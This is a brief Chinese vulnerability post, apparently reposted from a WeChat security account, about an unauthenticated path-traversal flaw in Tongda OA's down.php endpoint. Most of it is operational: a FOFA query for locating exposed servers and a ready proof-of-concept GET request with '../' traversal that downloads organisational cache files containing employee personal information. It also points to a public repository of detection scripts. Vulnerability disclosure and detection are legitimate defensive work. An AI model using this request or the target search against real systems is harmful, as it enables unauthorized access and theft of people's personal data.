通达OA down.php接口存在未授权访问漏洞
2023-12-1 09:52:3 Author: 网络安全透视镜(查看原文) 阅读量:91 收藏

通达OA(Office Anywhere网络智能办公系统) inc/package/down.php 接口存在未授权访问漏洞,通过此漏洞攻击者构造特殊链接,下载敏感文件,获取企业员工个人信息。

fofa查询

app="TDXK-通达OA"

POC

GET /inc/package/down.php?id=../../../cache/org HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept: */*Connection: Keep-Alive

下载后的文件

pocsuite3 检测

漏洞检测脚本已上传免费漏洞库

地址:

https://github.com/Vme18000yuan/FreePOC


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498550&idx=2&sn=1a24f13cd5d8bf94159953869bfd045f&chksm=974c5c0ea03bd5188d9c0bd8654ad0777cd85152c27416138ae4b1c16640717490c954de884e&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh